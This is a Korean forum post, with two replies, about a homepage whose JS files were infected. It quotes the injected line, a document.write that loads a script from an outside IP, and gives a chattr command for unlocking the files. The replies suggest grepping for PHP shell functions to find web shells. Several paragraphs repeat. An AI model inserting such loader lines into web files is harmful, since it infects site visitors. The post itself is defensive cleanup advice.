악성코드 처리 사례 정보
악성코드 처리 사례본문
요새 악성코드때문에 고통받는 홈페이지들이 많습니다...
사례들이 여러가지 있을 것 같아 #1 붙여봤습니다.
#1.
js디렉토리의 모든 js파일의 첫 줄에 다음과 유사한 코드가 들어가있습니다.
document.write("<script src='http://61.57.227.5/js/x.js?GMXZZQ'></script>");
이렇게 되면 크롬, 사파리, 불여우에서는 악성코드 포함된 사이트라고 못들어가게 막죠... -_-
js파일을 삭제나 수정하려고 하면 읽기전용이라 안됩니다.
그럼 읽기전용을 해제해야죠..
다음과 같이 하심 됩니다.
js]# chattr -i *
이렇게 하면 읽기전용이 해제되고요~
js파일을 수정/삭제할 수 있습니다~~~
//-------------------------------------------------------
하지만 문제는...
위와 같은 현상이 발생한 원인을 찾아서 해결을 봐야 한다는 겁니다. 그렇지 않으면 같은 상황이 반복될테니까요...
제 경우엔 data/file 디렉토리와 파일들에 문제가 보이더군요...
일일이 찾아서 삭제한다고 했는데 놓친 파일이 있을 수도 있으니 스트레스만 쌓여 갑니다...
노하우 공유 부탁드립니다~ ^^
사례들이 여러가지 있을 것 같아 #1 붙여봤습니다.
#1.
js디렉토리의 모든 js파일의 첫 줄에 다음과 유사한 코드가 들어가있습니다.
document.write("<script src='http://61.57.227.5/js/x.js?GMXZZQ'></script>");
이렇게 되면 크롬, 사파리, 불여우에서는 악성코드 포함된 사이트라고 못들어가게 막죠... -_-
js파일을 삭제나 수정하려고 하면 읽기전용이라 안됩니다.
그럼 읽기전용을 해제해야죠..
다음과 같이 하심 됩니다.
js]# chattr -i *
이렇게 하면 읽기전용이 해제되고요~
js파일을 수정/삭제할 수 있습니다~~~
//-------------------------------------------------------
하지만 문제는...
위와 같은 현상이 발생한 원인을 찾아서 해결을 봐야 한다는 겁니다. 그렇지 않으면 같은 상황이 반복될테니까요...
제 경우엔 data/file 디렉토리와 파일들에 문제가 보이더군요...
일일이 찾아서 삭제한다고 했는데 놓친 파일이 있을 수도 있으니 스트레스만 쌓여 갑니다...
노하우 공유 부탁드립니다~ ^^
추천
0
0
댓글 2개
chattr 해당 명령어로 js파일제한을 두어도 보안취약점이 존재하는한 모든파일을 컨트롤 하게 됩니다.
즉 js파일 이나 css 등 메인페이지에 존재하는 파일들을 변경해서 코드 삽입을 하더군요...
말씀하신 방법은 임시방편용일 뿐입니다.
업로드가 가능한 게시판등을 좀더 자세히 살펴 보시길 바랍니다.
확장자 체크(대소문자 구분) 등 구버전(에디터등)으로 사용되던 게시판이 있는지등을 다 체크해보셔야 할듯하네요.
즉 js파일 이나 css 등 메인페이지에 존재하는 파일들을 변경해서 코드 삽입을 하더군요...
말씀하신 방법은 임시방편용일 뿐입니다.
업로드가 가능한 게시판등을 좀더 자세히 살펴 보시길 바랍니다.
확장자 체크(대소문자 구분) 등 구버전(에디터등)으로 사용되던 게시판이 있는지등을 다 체크해보셔야 할듯하네요.
/data 폴더내에
system, exec, passthru, escapeshellcmd, pcntl_exec, shell_exec
이런 문자열을 포함하고 있는 파일들을 검색해서 확인 해보시면 웹셀툴을 찾으실 수 있을 겁니다.
system, exec, passthru, escapeshellcmd, pcntl_exec, shell_exec
이런 문자열을 포함하고 있는 파일들을 검색해서 확인 해보시면 웹셀툴을 찾으실 수 있을 겁니다.
